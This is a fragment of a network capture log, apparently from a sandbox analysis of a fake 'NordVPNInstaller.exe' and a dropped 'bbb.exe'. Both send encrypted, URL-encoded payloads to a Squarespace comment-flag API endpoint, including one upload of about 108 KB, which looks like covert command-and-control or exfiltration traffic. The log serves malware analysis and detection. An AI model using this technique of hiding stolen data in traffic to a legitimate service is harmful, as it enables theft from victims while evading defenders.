=S/CB%2B8Dd76rWWx4FcSKzmVNpbeWMtgWci4Cb4T7OLB%2BOUEmVOMcsytHEhRrbKYqdxScP%2B0ny%2BLtWdDHzy8b8xJo9PnqXVP3tYYy5er7svPSKuGh8JNJEHyVwEtx08BUUISpw0TEQi%2Bgf/1FKJpcVVARZkaHBFkssD4uvOpzizkaRqHBPEHZCkC9/roKqqt56TVTrfoWj/t18ijYxKAH7E5f11fAmg4LSFd5u2hOOIn8MGVpHOYYu
2024-09-01 19:55:14 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:55:14 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BSf_vKJ9snRgYTMwNTJmNTlmZDgwMGNhNjJiY2FhMTIxZGM1ODRk; Path=/; Secure Set-Cookie: crumb=BYEdeK0LAp_DOTFlNTQwMDk2ZjQ2NDhmOTIwMGI1NWIwYWZmYzlj; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: dLESW2Dk/DiegfrEa Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BYEdeK0LAp_DOTFlNTQwMDk2ZjQ2NDhmOTIwMGI1NWIwYWZmYzlj"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49746	198.185.159.177	443	1196	C:\Users\user\AppData\Roaming\bbb\bbb.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:55:41 UTC	317	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue Connection: Keep-Alive
2024-09-01 19:55:41 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:55:41 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:55:41 UTC	279	OUT	Data Raw: 3d 70 53 61 2f 68 4f 70 34 78 41 4e 6c 59 39 69 33 63 36 25 32 42 79 6d 31 4e 70 62 65 57 4d 74 67 57 63 69 34 43 62 34 54 37 4f 4c 42 25 32 42 4f 55 45 6d 56 4f 4d 63 73 79 74 48 45 68 52 72 62 4b 59 71 64 78 53 63 50 25 32 42 30 6e 79 25 32 42 4c 74 57 64 44 48 7a 79 38 62 38 78 50 67 72 50 6d 4f 4e 68 37 50 57 65 38 61 33 39 51 30 67 32 79 31 35 31 63 76 49 56 4f 46 39 69 35 5a 6d 55 31 42 37 46 47 50 6f 47 65 47 61 54 78 34 38 69 6b 56 5a 39 58 39 52 47 50 45 79 45 4f 77 4e 50 6e 4a 5a 39 37 77 7a 2f 64 77 39 41 63 2f 4e 4e 70 4c 66 36 7a 34 56 79 47 55 52 57 70 59 48 4d 46 64 6b 57 4e 74 7a 6a 65 59 71 30 67 7a 77 68 61 4d 41 7a 48 4d 53 32 56 58 35 56 4c 6d 6a 6d 4a 45 48 32 35 65 4c 66 58 6c 45 56 61 6e 6d 52 67 46 79 6c 74 33 67 57 4f 4c 4f 55 44 Data Ascii: =pSa/hOp4xANlY9i3c6%2Bym1NpbeWMtgWci4Cb4T7OLB%2BOUEmVOMcsytHEhRrbKYqdxScP%2B0ny%2BLtWdDHzy8b8xPgrPmONh7PWe8a39Q0g2y151cvIVOF9i5ZmU1B7FGPoGeGaTx48ikVZ9X9RGPEyEOwNPnJZ97wz/dw9Ac/NNpLf6z4VyGURWpYHMFdkWNtzjeYq0gzwhaMAzHMS2VX5VLmjmJEH25eLfXlEVanmRgFylt3gWOLOUD
2024-09-01 19:55:41 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:55:41 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BaEfK_v_dK87ZmIwODFlYzNiOGI0YmNlODcwYTYyODU5MDM3ODk5; Path=/; Secure Set-Cookie: crumb=BZRDe1UUcGXpNTMwMmQ0ZDIyNGU1ZDkzOTM4NmJlYTAzYzlhNjUx; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: Lb6rmWfj/z4IUsTda Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BZRDe1UUcGXpNTMwMmQ0ZDIyNGU1ZDkzOTM4NmJlYTAzYzlhNjUx"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49747	198.185.159.177	443	1196	C:\Users\user\AppData\Roaming\bbb\bbb.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:55:42 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 322 Expect: 100-continue
2024-09-01 19:55:42 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:55:42 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:55:42 UTC	321	OUT	Data Raw: 3d 66 4c 74 30 72 76 63 61 63 36 34 25 32 42 45 48 38 71 74 46 37 73 59 45 33 62 79 6b 47 48 39 58 25 32 42 7a 78 63 35 4b 38 35 54 4c 75 7a 54 62 6d 6e 38 66 75 34 31 70 34 2f 6d 53 6f 44 4b 76 6b 66 5a 31 50 52 7a 48 6e 43 31 4a 70 35 6e 45 59 67 74 73 4e 77 6a 68 4d 61 71 4a 37 35 75 4a 46 44 67 6a 63 4a 59 4d 67 4f 75 43 4a 6d 55 66 2f 6e 38 53 46 6e 4c 48 31 5a 49 77 6d 6f 45 6b 68 47 37 37 2f 42 6f 65 30 4f 5a 72 62 4b 6a 78 36 66 62 68 66 34 77 32 39 32 5a 73 79 37 64 35 56 72 52 62 6c 38 58 31 39 75 4e 38 73 6a 6d 32 73 32 68 31 72 39 4c 45 54 5a 45 47 2f 4d 6f 72 42 56 4e 33 33 67 31 53 51 4b 45 5a 72 44 72 36 45 35 55 41 46 67 30 65 53 5a 59 46 7a 7a 77 65 70 64 57 68 74 39 45 51 47 6c 6c 69 6f 6f 56 6d 41 6b 72 6c 25 32 42 2f 48 77 69 33 36 68 Data Ascii: =fLt0rvcac64%2BEH8qtF7sYE3bykGH9X%2Bzxc5K85TLuzTbmn8fu41p4/mSoDKvkfZ1PRzHnC1Jp5nEYgtsNwjhMaqJ75uJFDgjcJYMgOuCJmUf/n8SFnLH1ZIwmoEkhG77/Boe0OZrbKjx6fbhf4w292Zsy7d5VrRbl8X19uN8sjm2s2h1r9LETZEG/MorBVN33g1SQKEZrDr6E5UAFg0eSZYFzzwepdWht9EQGlliooVmAkrl%2B/Hwi36h
2024-09-01 19:55:42 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:55:42 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BafbGuEna5juYmViM2MwODMxYjQ5M2NlYmY0MWU5MTkyMTY4OTk5; Path=/; Secure Set-Cookie: crumb=BRgKR9IzIgjQZWJlY2YwM2FiZDYzNmY2YjFlNDIyYWJlYWNkMzJi; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: cURprZGc/d4cmy0DT Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BRgKR9IzIgjQZWJlY2YwM2FiZDYzNmY2YjFlNDIyYWJlYWNkMzJi"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49748	198.185.159.177	443	1196	C:\Users\user\AppData\Roaming\bbb\bbb.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:55:42 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 314 Expect: 100-continue
2024-09-01 19:55:42 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:55:42 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:55:42 UTC	313	OUT	Data Raw: 3d 54 55 43 48 51 44 30 70 74 75 71 6d 75 58 50 48 43 59 69 6e 6d 79 53 38 66 35 50 58 63 45 71 4c 45 25 32 42 48 41 6e 61 76 56 6c 41 76 54 35 38 6e 79 67 58 61 56 2f 56 4d 53 30 32 30 64 71 65 41 61 69 62 6e 41 61 6c 4a 69 33 41 47 43 7a 55 39 51 6f 53 4f 49 52 4f 7a 30 61 2f 30 36 78 61 54 47 57 45 54 44 7a 79 74 69 6b 6a 5a 72 6d 6d 6f 4e 45 47 33 6a 72 77 76 6f 36 44 45 71 50 54 61 36 68 38 64 4d 46 4a 35 67 2f 75 5a 78 55 41 25 32 42 73 77 52 46 51 6b 6c 6d 30 25 32 42 31 55 54 4e 6f 45 46 59 77 77 49 57 53 25 32 42 76 38 6a 55 31 37 30 55 72 53 62 74 59 56 43 41 39 6f 54 39 42 37 58 64 51 34 63 79 30 69 61 76 69 63 48 64 57 71 49 25 32 42 41 37 4e 63 74 2f 49 50 55 31 64 41 4c 63 4f 6e 6d 77 75 78 31 50 32 6b 36 52 6d 39 69 4f 4e 64 51 50 4d 69 50 Data Ascii: =TUCHQD0ptuqmuXPHCYinmyS8f5PXcEqLE%2BHAnavVlAvT58nygXaV/VMS020dqeAaibnAalJi3AGCzU9QoSOIROz0a/06xaTGWETDzytikjZrmmoNEG3jrwvo6DEqPTa6h8dMFJ5g/uZxUA%2BswRFQklm0%2B1UTNoEFYwwIWS%2Bv8jU170UrSbtYVCA9oT9B7XdQ4cy0iavicHdWqI%2BA7Nct/IPU1dALcOnmwux1P2k6Rm9iONdQPMiP
2024-09-01 19:55:43 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:55:42 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BZWHIE8NRP6zZjc3OTdkMzBiMDEzZjZlMjMyOWQ4MTY4MzJkNzBh; Path=/; Secure Set-Cookie: crumb=BR6f12sZhz-eOTZiNTNkOTFhZDkwOWU0YWJhNGQyNTNjNWM2YmZl; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: uOShAsrI/8vkAflzd Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BR6f12sZhz-eOTZiNTNkOTFhZDkwOWU0YWJhNGQyNTNjNWM2YmZl"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49749	198.185.159.177	443	1196	C:\Users\user\AppData\Roaming\bbb\bbb.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:55:43 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 578 Expect: 100-continue
2024-09-01 19:55:43 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:55:43 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:55:43 UTC	577	OUT	Data Raw: 3d 53 2f 43 42 25 32 42 38 44 64 37 36 72 57 57 78 34 46 63 53 4b 7a 6d 56 4e 70 62 65 57 4d 74 67 57 63 69 34 43 62 34 54 37 4f 4c 42 25 32 42 4f 55 45 6d 56 4f 4d 63 73 79 74 48 45 68 52 72 62 4b 59 71 64 78 53 63 50 25 32 42 30 6e 79 25 32 42 4c 74 57 64 44 48 7a 79 38 62 38 78 4a 6f 39 50 6e 71 58 56 50 33 74 59 59 79 35 65 72 37 73 76 50 53 4b 69 56 33 53 45 61 41 6f 39 43 56 77 45 74 78 30 38 42 55 55 49 53 70 77 30 54 45 51 69 25 32 42 67 66 2f 31 46 4b 4a 70 63 56 56 41 52 5a 6b 61 48 42 46 6b 73 73 44 34 75 76 4f 70 7a 69 7a 6b 61 52 71 48 42 50 45 48 5a 43 6b 43 39 2f 72 6f 4b 71 71 74 35 36 54 56 54 72 66 6f 57 6a 2f 74 31 38 69 6a 59 78 4b 41 48 37 45 35 66 31 31 66 41 6d 67 34 4c 53 46 64 35 75 32 68 4f 4f 49 6e 38 4d 47 56 70 48 4f 59 59 75 Data Ascii: =S/CB%2B8Dd76rWWx4FcSKzmVNpbeWMtgWci4Cb4T7OLB%2BOUEmVOMcsytHEhRrbKYqdxScP%2B0ny%2BLtWdDHzy8b8xJo9PnqXVP3tYYy5er7svPSKiV3SEaAo9CVwEtx08BUUISpw0TEQi%2Bgf/1FKJpcVVARZkaHBFkssD4uvOpzizkaRqHBPEHZCkC9/roKqqt56TVTrfoWj/t18ijYxKAH7E5f11fAmg4LSFd5u2hOOIn8MGVpHOYYu
2024-09-01 19:55:43 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:55:43 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BTENs7KrvfMkY2Q2MTlkNzhiYmQ1OGY5ZWQ3YTgzNzUzMzAxZTQx; Path=/; Secure Set-Cookie: crumb=Bci8CZ868KNGYTU3NGM2NWEzZTc3Yjc1ZjU2MTZjYjFjZDI0Y2Y1; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: 6lYPBqov/9L0ipgC2 Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"Bci8CZ868KNGYTU3NGM2NWEzZTc3Yjc1ZjU2MTZjYjFjZDI0Y2Y1"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49751	198.185.159.177	443	3524	C:\Users\user\Desktop\NordVPNInstaller.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:56:00 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 19:56:01 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:56:01 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:56:01 UTC	279	OUT	Data Raw: 3d 70 53 61 2f 68 4f 70 34 78 41 4e 6c 59 39 69 33 63 36 25 32 42 79 6d 31 4e 70 62 65 57 4d 74 67 57 63 69 34 43 62 34 54 37 4f 4c 42 25 32 42 4f 55 45 6d 56 4f 4d 63 73 79 74 48 45 68 52 72 62 4b 59 71 64 78 53 63 50 25 32 42 30 6e 79 25 32 42 4c 74 57 64 44 48 7a 79 38 62 38 78 50 67 72 50 6d 4f 4e 68 37 50 57 65 38 61 33 39 51 30 67 32 79 31 35 31 63 76 49 56 4f 46 39 69 35 5a 6d 55 31 42 37 46 47 50 6f 47 65 47 61 54 78 34 38 69 6b 56 5a 39 58 39 52 47 50 45 79 45 4f 77 4e 50 6e 4a 5a 39 37 77 7a 2f 64 77 39 41 63 2f 4e 4e 70 4c 66 36 7a 34 56 79 47 55 52 57 70 59 48 4d 46 64 6b 57 4e 74 7a 6a 65 59 71 30 67 7a 77 68 61 4d 41 7a 48 4d 53 32 56 58 35 56 4c 6d 6a 6d 4a 45 48 32 35 65 4c 66 58 6c 45 56 61 6e 6d 52 67 46 79 6c 74 33 67 57 4f 4c 4f 55 44 Data Ascii: =pSa/hOp4xANlY9i3c6%2Bym1NpbeWMtgWci4Cb4T7OLB%2BOUEmVOMcsytHEhRrbKYqdxScP%2B0ny%2BLtWdDHzy8b8xPgrPmONh7PWe8a39Q0g2y151cvIVOF9i5ZmU1B7FGPoGeGaTx48ikVZ9X9RGPEyEOwNPnJZ97wz/dw9Ac/NNpLf6z4VyGURWpYHMFdkWNtzjeYq0gzwhaMAzHMS2VX5VLmjmJEH25eLfXlEVanmRgFylt3gWOLOUD
2024-09-01 19:56:01 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:56:01 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=Bc38fGXEopBMZTg0NDkzNTkxZjdmNGQxMDQ4M2MwYzVhNzA1NDc1; Path=/; Secure Set-Cookie: crumb=BRPxPHRVu9PPN2M4MWFmNjIzYjFiNGY1OGQwNjQwZmFlNDcyOWQ0; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: kizKvo8t/QzW7K8N4 Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BRPxPHRVu9PPN2M4MWFmNjIzYjFiNGY1OGQwNjQwZmFlNDcyOWQ0"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49752	198.185.159.177	443	3524	C:\Users\user\Desktop\NordVPNInstaller.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:56:01 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 850 Expect: 100-continue
2024-09-01 19:56:01 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:56:01 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:56:01 UTC	849	OUT	Data Raw: 3d 52 44 5a 6d 4c 4d 38 48 52 51 73 59 35 4f 7a 44 35 58 39 2f 34 45 33 62 79 6b 47 48 39 58 25 32 42 7a 78 63 35 4b 38 35 54 4c 75 7a 54 62 6d 6e 38 66 75 34 31 70 34 2f 6d 53 6f 44 4b 76 6b 66 5a 31 50 52 7a 48 6e 43 31 4a 70 35 6e 45 59 67 74 73 4e 77 6a 68 4d 61 71 4a 37 35 75 4a 46 44 67 6a 42 74 36 61 5a 71 4c 38 58 4f 31 5a 33 35 31 30 34 2f 76 64 77 5a 49 77 6d 6f 45 6b 68 47 37 37 2f 42 6f 65 30 4f 5a 72 62 4b 6a 78 36 66 62 68 66 34 77 32 39 77 34 7a 6f 46 67 6b 77 66 63 55 67 6c 2f 67 36 74 64 6b 4a 53 65 48 70 66 4b 39 4a 45 25 32 42 5a 4c 5a 51 25 32 42 37 48 6e 64 66 33 34 56 78 2f 72 61 44 31 47 68 6a 50 47 75 76 52 54 42 53 53 39 5a 30 69 25 32 42 47 4a 6e 44 75 6a 67 76 53 57 53 76 51 38 67 2f 76 49 67 61 78 52 65 62 46 67 45 55 71 43 30 Data Ascii: =RDZmLM8HRQsY5OzD5X9/4E3bykGH9X%2Bzxc5K85TLuzTbmn8fu41p4/mSoDKvkfZ1PRzHnC1Jp5nEYgtsNwjhMaqJ75uJFDgjBt6aZqL8XO1Z35104/vdwZIwmoEkhG77/Boe0OZrbKjx6fbhf4w29w4zoFgkwfcUgl/g6tdkJSeHpfK9JE%2BZLZQ%2B7Hndf34Vx/raD1GhjPGuvRTBSS9Z0i%2BGJnDujgvSWSvQ8g/vIgaxRebFgEUqC0
2024-09-01 19:56:01 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:56:01 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BTGXOyhkrFIHYWIyYzkxZGViMmQ4OTJkZmE3NWViM2YwZjI4ZTVm; Path=/; Secure Set-Cookie: crumb=BSgbcp0YPOWkMDZjN2UxNTI0Y2E3YzBlMzcxMDVhYTA4OWZlN2Nm; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: mwQTrXma/GrtB38Ow Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BSgbcp0YPOWkMDZjN2UxNTI0Y2E3YzBlMzcxMDVhYTA4OWZlN2Nm"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49753	198.185.159.177	443	3524	C:\Users\user\Desktop\NordVPNInstaller.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:56:01 UTC	296	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 108322 Expect: 100-continue
2024-09-01 19:56:01 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:56:01 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:56:01 UTC	16306	OUT	Data Raw: 3d 6e 55 61 46 59 5a 59 4f 2f 51 62 42 4d 70 25 32 42 71 73 50 4d 44 4f 43 31 72 56 48 6d 43 74 36 70 6c 57 73 65 37 33 72 65 51 25 32 42 6a 6a 39 46 48 79 75 62 25 32 42 76 58 39 66 4c 33 64 65 79 56 63 52 72 6f 57 4a 30 32 6c 56 6d 62 4d 51 51 72 30 35 55 7a 79 78 70 53 41 62 72 6a 4a 43 30 5a 77 6f 73 75 4f 66 54 50 62 46 46 39 32 59 7a 56 4d 6b 32 7a 4c 6d 57 70 7a 6e 62 62 58 32 52 25 32 42 74 34 69 59 6d 49 6d 75 48 38 67 79 74 34 4f 57 34 49 61 4d 4b 48 76 54 4c 33 30 71 61 53 54 64 37 6c 57 57 6f 71 30 75 37 2f 4a 4e 67 4c 44 47 38 70 25 32 42 65 53 35 55 71 4a 71 37 44 61 54 59 42 73 30 59 4b 52 43 4b 62 78 4d 77 6c 68 75 68 6d 33 56 6e 74 34 79 47 50 74 6a 6c 34 4a 59 44 6f 71 56 37 42 64 51 70 67 45 39 6e 64 77 52 57 25 32 42 44 55 51 77 68 6c Data Ascii: =nUaFYZYO/QbBMp%2BqsPMDOC1rVHmCt6plWse73reQ%2Bjj9FHyub%2BvX9fL3deyVcRroWJ02lVmbMQQr05UzyxpSAbrjJC0ZwosuOfTPbFF92YzVMk2zLmWpznbbX2R%2Bt4iYmImuH8gyt4OW4IaMKHvTL30qaSTd7lWWoq0u7/JNgLDG8p%2BeS5UqJq7DaTYBs0YKRCKbxMwlhuhm3Vnt4yGPtjl4JYDoqV7BdQpgE9ndwRW%2BDUQwhl
2024-09-01 19:56:01 UTC	1	OUT	Data Raw: 48 Data Ascii: H
2024-09-01 19:56:01 UTC	16306	OUT	Data Raw: 4a 38 75 54 45 6a 69 35 6e 68 57 45 58 4f 54 4e 74 68 66 67 55 6a 66 42 7a 57 4a 25 32 42 4a 2f 41 32 32 4a 5a 6a 45 53 69 6d 46 65 56 46 4b 54 6b 47 30 34 53 63 67 71 75 31 38 52 77 34 48 56 6a 52 61 52 46 48 70 43 75 4a 33 69 33 45 7a 51 36 42 41 46 50 64 69 62 6c 74 4a 58 4d 64 58 43 62 52 65 63 75 4f 78 6e 6e 67 68 71 70 58 67 47 46 51 49 4c 72 52 78 6c 6b 41 69 43 33 57 7a 36 45 4f 4a 45 35 79 34 71 33 77 4c 53 51 69 35 31 78 75 53 51 59 66 68 41 6e 48 5a 4a 52 45 47 54 41 69 55 47 6b 35 47 78 70 50 41 55 4a 7a 7a 39 71 47 32 66 4c 6b 50 65 62 59 4b 43 47 41 64 42 43 56 25 32 42 2f 35 5a 66 54 67 5a 77 34 30 51 36 4a 2f 4e 56 68 4f 6d 4a 46 42 70 4f 52 73 61 54 77 46 43 6e 6f 78 57 68 61 34 49 4a 4e 6f 2f 64 53 38 54 77 63 36 35 46 6a 54 63 6f 42 70 Data Ascii: J8uTEji5nhWEXOTNthfgUjfBzWJ%2BJ/A22JZjESimFeVFKTkG04Scgqu18Rw4HVjRaRFHpCuJ3i3EzQ6BAFPdibltJXMdXCbRecuOxnnghqpXgGFQILrRxlkAiC3Wz6EOJE5y4q3wLSQi51xuSQYfhAnHZJREGTAiUGk5GxpPAUJzz9qG2fLkPebYKCGAdBCV%2B/5ZfTgZw40Q6J/NVhOmJFBpORsaTwFCnoxWha4IJNo/dS8Twc65FjTcoBp
2024-09-01 19:56:01 UTC	1	OUT	Data Raw: 6c Data Ascii: l
2024-09-01 19:56:01 UTC	16306	OUT	Data Raw: 61 62 61 61 53 50 32 53 67 4e 2f 33 34 5a 33 39 56 42 5a 52 4c 4d 37 4f 6d 32 25 32 42 71 79 73 36 63 67 44 51 72 74 55 38 67 78 32 7a 53 51 4d 77 72 4c 30 37 71 35 62 57 54 4c 43 2f 61 7a 50 4a 5a 4c 76 6b 6a 49 58 74 66 32 71 44 43 79 32 55 59 4c 44 72 4e 77 6e 6f 52 32 37 68 43 72 74 35 61 31 6f 34 71 4e 31 6d 55 35 71 51 74 6b 52 31 41 43 56 46 59 64 6b 76 50 35 5a 38 63 65 50 44 35 46 53 35 51 39 25 32 42 44 6e 65 73 6d 45 4d 78 39 74 4d 42 41 63 67 53 47 53 45 25 32 42 6c 2f 74 67 4c 67 69 53 25 32 42 32 56 67 53 51 4d 5a 38 70 63 71 42 44 66 6b 53 4b 50 61 6e 72 39 4c 48 46 33 41 48 35 31 62 7a 77 73 48 67 78 4a 63 47 62 6f 34 4e 6d 35 78 59 4e 76 49 42 38 4a 43 59 45 48 70 55 77 7a 63 73 74 65 76 4a 2f 37 4d 79 2f 49 67 70 63 67 5a 39 63 6c 56 31 Data Ascii: abaaSP2SgN/34Z39VBZRLM7Om2%2Bqys6cgDQrtU8gx2zSQMwrL07q5bWTLC/azPJZLvkjIXtf2qDCy2UYLDrNwnoR27hCrt5a1o4qN1mU5qQtkR1ACVFYdkvP5Z8cePD5FS5Q9%2BDnesmEMx9tMBAcgSGSE%2Bl/tgLgiS%2B2VgSQMZ8pcqBDfkSKPanr9LHF3AH51bzwsHgxJcGbo4Nm5xYNvIB8JCYEHpUwzcstevJ/7My/IgpcgZ9clV1
2024-09-01 19:56:01 UTC	1	OUT	Data Raw: 39 Data Ascii: 9
2024-09-01 19:56:01 UTC	16306	OUT	Data Raw: 50 41 79 56 6e 73 58 67 45 47 6e 38 74 59 6a 32 68 4b 59 68 77 69 46 39 34 6c 38 69 2f 6d 6e 68 44 39 37 37 74 42 63 74 51 52 6e 45 44 52 43 56 75 77 6c 38 73 6f 7a 4c 54 4a 6a 4a 61 37 37 50 47 6c 4f 79 5a 70 4c 2f 6e 35 4a 63 6b 6f 44 25 32 42 71 51 45 61 45 7a 49 43 77 31 4e 37 7a 4c 34 6b 4c 34 70 64 6d 63 66 45 69 51 6e 61 57 32 4c 4e 67 55 73 78 31 67 2f 79 4c 66 2f 5a 47 39 39 37 6a 5a 57 50 36 44 69 54 56 50 44 44 31 38 4d 79 46 34 42 6d 58 67 35 65 37 41 6e 4f 4e 58 6f 25 32 42 54 77 49 58 4a 43 6a 6b 50 73 63 53 25 32 42 50 49 59 67 4f 37 44 34 5a 55 30 39 47 44 52 4f 76 47 53 53 76 4f 65 79 49 55 34 36 70 57 72 67 66 76 37 6c 57 72 4c 66 32 57 58 74 38 46 63 6a 5a 6d 6c 63 39 4e 61 6b 35 5a 41 70 4c 58 4c 4d 7a 74 39 6b 73 4a 44 4e 77 67 7a 37 Data Ascii: PAyVnsXgEGn8tYj2hKYhwiF94l8i/mnhD977tBctQRnEDRCVuwl8sozLTJjJa77PGlOyZpL/n5JckoD%2BqQEaEzICw1N7zL4kL4pdmcfEiQnaW2LNgUsx1g/yLf/ZG997jZWP6DiTVPDD18MyF4BmXg5e7AnONXo%2BTwIXJCjkPscS%2BPIYgO7D4ZU09GDROvGSSvOeyIU46pWrgfv7lWrLf2WXt8FcjZmlc9Nak5ZApLXLMzt9ksJDNwgz7
2024-09-01 19:56:01 UTC	1	OUT	Data Raw: 64 Data Ascii: d
